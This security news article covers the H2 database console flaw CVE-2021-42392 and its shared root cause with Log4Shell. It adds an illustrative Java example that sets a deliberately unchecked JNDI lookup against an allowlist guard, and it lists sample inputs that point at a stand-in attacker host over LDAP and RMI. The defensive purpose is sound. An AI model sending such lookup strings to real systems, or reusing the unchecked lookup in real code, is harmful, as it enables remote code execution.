Researchers have disclosed a critical vulnerability in the H2 database console that can lead to remote code execution and shares its root cause with the Log4j "Log4Shell" vulnerability disclosed last month.
The issue, tracked as CVE-2021-42392, is the "first critical issue published since Log4Shell, on a component other than Log4j, that exploits the same root cause of the Log4Shell vulnerability, namely JNDI remote class loading," JFrog researchers Andrey Polkovnychenko and Shachar Menashe said.
H2 is a Java-based open-source relational database management system that can be embedded in applications or run in a client-server configuration. According to the Maven Repository, the H2 database engine is used by 6,807 artifacts.
JNDI (Java Naming and Directory Interface) is a Java API that provides naming and directory services to Java applications. It is commonly used together with LDAP to locate a resource that a Java application needs at runtime.
In the case of Log4Shell, this feature allows runtime lookups against servers both inside and outside the network. An attacker weaponizes it by supplying a crafted JNDI lookup string as input to any Java application that logs that input with a vulnerable version of Log4j; the resulting remote class loading gives unauthenticated remote code execution and lets the attacker install malware on the server.
“Attacker-controlled URLs that propagate into JNDI lookups, similar to the Log4Shell vulnerability discovered in early December, can allow unauthenticated remote code execution, giving attackers sole control over the operation of another person’s or organization’s systems,” Menashe, senior director of JFrog security research, explained.
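The pattern Menashe describes, an attacker-controlled name flowing into a JNDI lookup, and the allowlist check that stops it are shown below as an added example. This is illustrative code written for this page, not code from H2, JFrog or Log4j; the class and method names are invented and the sample inputs are constructed. The hardened form restricts lookups to the local `java:` namespace so that no URL scheme such as `ldap://` or `rmi://` can select a remote naming provider.

```java
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.List;

public class JndiLookupGuard {

    // Vulnerable pattern (illustrative, not H2's code): a lookup name taken
    // from request input is handed straight to JNDI. A name such as
    // "ldap://attacker.example/x" makes the JNDI provider connect to that
    // host and may load an attacker-supplied class, which is the shared root
    // cause of Log4Shell and CVE-2021-42392.
    static Object lookupUnchecked(String nameFromUser) throws NamingException {
        return new InitialContext().lookup(nameFromUser);
    }

    // Hardened check: accept only names in the local "java:" namespace and
    // refuse any further scheme separator, so "ldap://...", "rmi://..." and
    // "java:ldap://..." are all rejected before JNDI ever sees them.
    static boolean isLocalJndiName(String name) {
        if (name == null) {
            return false;
        }
        String n = name.trim();
        if (!n.startsWith("java:")) {
            return false;
        }
        String rest = n.substring("java:".length());
        return rest.indexOf(':') < 0;
    }

    // Hardened form of the lookup: the allowlist runs first, and anything
    // that is not a local name is refused with an exception.
    static Object lookupChecked(String nameFromUser) throws NamingException {
        if (!isLocalJndiName(nameFromUser)) {
            throw new IllegalArgumentException(
                "refusing JNDI lookup of non-local name: " + nameFromUser);
        }
        return new InitialContext().lookup(nameFromUser);
    }

    public static void main(String[] args) {
        // Constructed sample inputs for this example; not taken from any real attack.
        List<String> samples = List.of(
            "java:comp/env/jdbc/app",
            "ldap://attacker.example:1389/Exploit",
            "rmi://attacker.example:1099/Exploit",
            "java:ldap://attacker.example/x");
        for (String s : samples) {
            System.out.println((isLocalJndiName(s) ? "allow " : "block ") + s);
        }
    }
}
```

Running `main` exercises only the allowlist, so it works without a configured JNDI provider; the two `lookup` methods are there to contrast the unchecked call with the guarded one. The same idea applies to any code path where a string from a request, a configuration field or a log message can end up as the argument of `Context.lookup`: validate the name against the local namespace before the lookup, rather than trying to blocklist individual schemes.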
Versions 1.1.100 through 2.0.204 of the H2 database are affected, and the problem was fixed in version 2.0.206, which was released on January 5, 2022.
“Many third-party frameworks, such as Spring Boot, Play Framework, and JHipster, employ the H2 database,” Menashe continued. “While this vulnerability isn’t as ubiquitous as Log4Shell, it can still have a significant impact on developers and production systems if it isn’t addressed.”